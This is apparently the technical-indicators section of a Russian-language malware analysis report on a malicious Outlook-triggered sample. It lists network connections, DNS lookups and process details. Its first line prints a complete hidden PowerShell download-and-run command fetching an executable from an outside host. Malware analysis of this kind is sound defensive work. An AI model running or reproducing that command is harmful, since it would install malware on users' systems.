Техническая информация
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -w Hidden Invoke-WebRequest -Uri "http://scaladevelopments.scaladevco.com/13Z/IMG_0501_765_013.exe" -OutFile "C:\Users\Public\Documents\avoideast.exe";C:\Users\Public\Documents\avoideast.exe
- %TEMP%\outlook logging\firstrun.log
- 'sc########opments.scaladevco.com':80
- 'sc########opments.scaladevco.com':443
- 'x1.#.lencr.org':80
- http://sc########opments.scaladevco.com/13Z/IMG_0501_765_013.exe
- http://x1.#.lencr.org/
- 'sc########opments.scaladevco.com':443
- DNS ASK sc########opments.scaladevco.com
- DNS ASK x1.#.lencr.org
- ClassName: 'mspim_wnd32' WindowName: 'Microsoft Outlook'
- '%ProgramFiles(x86)%\microsoft office\office16\outlook.exe' -Embedding